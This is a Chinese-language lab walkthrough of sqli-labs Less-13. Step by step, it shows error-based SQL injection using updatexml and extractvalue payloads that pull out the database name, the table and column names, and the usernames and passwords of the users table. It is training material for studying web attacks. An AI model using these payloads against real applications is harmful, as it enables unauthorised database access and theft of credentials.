sql_lab之sqli中的报错注入,less13

报错注入(less-13)

正常报错注入:

1.输入用户名和密码123 123显示登录错误

sql_lab之sqli中的报错注入,less13_第1张图片

2.输入用户名和密码123’ 123显示登录错误sql_lab之sqli中的报错注入,less13_第2张图片

123后面有’)说明是’)注入

3.查询数据库名

1') and updatexml('',concat('1111',database(),'1'),'1') -- s

爆出XPATH syntax error: 'security1'

或者用1') and extractvalue('1',concat('1',database())) -- s

爆出XPATH syntax error: 'security'

4.查询表名

1') and extractvalue('1',concat('1',(select group_concat(table_name) from information_schema.tables where table_schema='SECURITY'))) -- s

5.查询users用户的字段名

1') and extractvalue('1',concat('1',(select group_concat(column_name) from information_schema.columns where table_schema='SECURITY' and table_name='users'))) -- s

sql_lab之sqli中的报错注入,less13_第3张图片

6.查询username和password

输入这个

1') and extractvalue('1',concat('1',(select group_concat(username) from users))) -- s

Username结果显示

同理

1') and extractvalue('1',concat('1',(select group_concat(password) from users))) -- s

Password结果显示

注意该结果只能显示一行,所以说需要username和password分开查询,否则会出现错误

比如:

=1') and extractvalue('1',concat('1',(select group_concat(username),group_concat(password) from users))) -- s

结果为:

你可能感兴趣的:(sql,数据库,java)